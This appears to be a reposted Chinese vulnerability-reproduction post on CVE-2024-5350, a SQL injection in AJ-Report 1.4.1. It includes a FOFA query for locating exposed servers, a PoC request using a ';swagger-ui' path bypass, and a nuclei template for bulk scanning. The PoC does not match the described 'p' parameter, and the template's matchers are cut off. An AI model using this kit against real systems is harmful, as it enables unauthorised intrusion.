漏洞复现-CVE-2024-5350

admin 2024年6月3日16:55:18评论34 views字数 1333阅读4分26秒阅读模式
 

:漏洞名称

AJ-Report pageList sql注入漏洞

:漏洞描述

AJ-Report 1.4.1 是一个灵活的开源工具,可轻松生成各种动态报表,并支持多种数据源。它易于集成到 Java Web 应用程序中,提供了丰富的定制选项,适用于开发人员快速创建和展示报表。

AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。

漏洞影响版本

AJ-Report up to 1.4.1

:网络空间测绘查询

title="AJ-Report"

漏洞复现-CVE-2024-5350

漏洞复现-CVE-2024-5350

:漏洞复现

poc
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzip

漏洞复现-CVE-2024-5350

SQL注入(SQL Injection)是一种常见的安全漏洞,它允许攻击者利用应用程序中存在的漏洞,向数据库中执行恶意的SQL查询。其原理主要涉及到应用程序对用户输入的处理不当,使得恶意用户可以在输入中插入SQL代码,从而实现对数据库的非法操作。
:批量检测
nuclei.exe -t CVE-2024-5350.yaml -l host.txt
:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。

批量验证脚本

id: CVE-2024-5350

info:
  name: AJ-Report pageList sql注入漏洞
  author: fgz
  severity: critical
  description: AJ-Report up to 1.4.1的漏洞已被发现,被分类为关键。受影响的是/pageList文件中的pageList函数。对参数p的操纵会导致sql注入。攻击可以远程发起。漏洞已被披露给公众,并可能被利用。
  metadata:
    max-request: 1
    fofa-query: title="AJ-Report"
    verified: true

requests:
  - raw:
      - |+
        GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-5350

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月3日16:55:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-5350https://cn-sec.com/archives/2809962.html

发表评论

匿名网友 填写信息